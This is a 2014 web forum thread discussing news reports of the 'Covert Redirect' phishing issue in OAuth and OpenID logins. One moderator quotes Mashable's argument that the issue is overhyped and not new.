Welcome to WebmasterWorld Guest from

Forum Moderators: phranque

Message Too Old, No Replies

Security Flaw Found in OAuth and OpenID


travelin cat

4:59 pm on May 2, 2014 (gmt 0)

WebmasterWorld Administrator travelin_cat is a WebmasterWorld Top Contributor of All Time 10+ Year Member

Called the "Covert Redirect" flaw, the vulnerability allows hackers to trick users into authorizing an app or site using malicious phishing links. For example, if you visit a site and click a button to log in with Google or Facebook, you'll see the familiar authorization popup. If you authorize the login, your personal data can be sent to the hacker instead of to the site. This can include your email address, contact lists, birthday, and more. The vulnerability could also redirect you to a different look-alike website.


Robert Charlton

8:04 pm on May 2, 2014 (gmt 0)

WebmasterWorld Administrator robert_charlton is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

From the above LifeHacker article...

Another day, another major internet security flaw (step aside, Heartbleed).

That's going way too far. It's understandable that we're all a bit wary after Heartbleed... but the press is always eager to make hay, and I'm tending to believe Mashable's more careful descriptions of the Covert Redirect flaw....

Another Security Flaw Gets the Heartbleed Treatment, But Don't Believe the Hype
Mashable - May 2, 2014
http://mashable.com/2014/05/02/oauth-openid-not-new-heartbleed/ [mashable.com]

My emphasis added...
...Already, we're seeing news organizations report this as the next major web security crisis.

Fortunately, Covert Redirect is not the next Heartbleed. In fact, from what we can ascertain, the Covert Redirect "flaw" isn't even new. Moreover, classifying Covert Redirect as a vulnerability with OAuth 2.0 and OpenID is incorrect.

That isn't to say that a potential problem doesn't exist it does and we'll discuss how it works but it is important to understand that this isn't a new discovery and that companies such as LinkedIn, Facebook and Google are already aware of the potential concerns....

It's good to be aware of the potential phishing problem the flaw might create, and to push Facebook and others to come up with a more secure implementation.

A lot of the article has to do with the type of overblown reporting we're likely to see on security matters going forward, which is unfortunate if that makes us blind to real emergencies. Again, this isn't on the Heartbleed level.

I hope we'll see more detail in the coming days.

Featured Threads

Hot Threads This Week

Hot Threads This Month